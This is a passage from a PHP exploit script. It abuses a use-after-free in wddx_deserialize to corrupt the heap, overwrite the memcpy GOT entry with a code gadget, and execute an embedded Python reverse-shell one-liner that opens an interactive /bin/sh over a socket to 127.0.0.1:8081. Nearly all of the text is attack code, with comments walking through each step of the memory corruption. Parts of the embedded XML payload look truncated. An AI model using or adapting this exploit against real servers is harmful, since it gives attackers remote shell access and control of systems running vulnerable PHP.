> 32); } function exploit() { global $g,$t; // avoid php atomatic free my corrupted chunk when exploit function exit $xml = << HERE REPLACE EOF; $back_shell = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"; $back_shell.= "s.connect((\"127.0.0.1\",8081));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);"; $back_shell.= "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"; $g = null; $write_value = base64_encode(pack8(0x61de65).str_repeat("P",1)); $write_addr = pack8(0xe94b00 - 0x10); # overwrite heap->cache[0] = 0xe94b00; $xml = str_replace("HERE",$write_value,$xml); $xml = str_replace("REPLACE",base64_encode(str_repeat("Z",64)),$xml); $wddx = wddx_deserialize($xml); // trigger use after free $t = "".str_repeat("F",32); // try to _emalloc in zend_heap foreach($wddx as $k => $v){ // $t = $v . "\x00"; $k = ""; $k.= $write_addr; // $k now point to free_chunk, then overwrite free_chunk->prev = my addr // printf("Key: %s\nValue: %s\n",$k,$v); $t = (string)$v; // then may heap->cache[0] = my_addr // make emalloc() return own $write_addr $g = (string)$v; // overwrite memcpy@got pointer, point into this code // 0x61de65 : mov rcx,rbx // 0x61de68 : xor edx,edx // 0x61de6a : mov edi,ebp // 0x61de6c : call 0x61d9a0 // when concat_function is called, then it reach memcpy $back_shell to new buffer // and now we have rsi point to $back_shell, and php_exec will do the rest for us :D $c = $back_shell.$t; // trigger shell break; } } exploit() ?>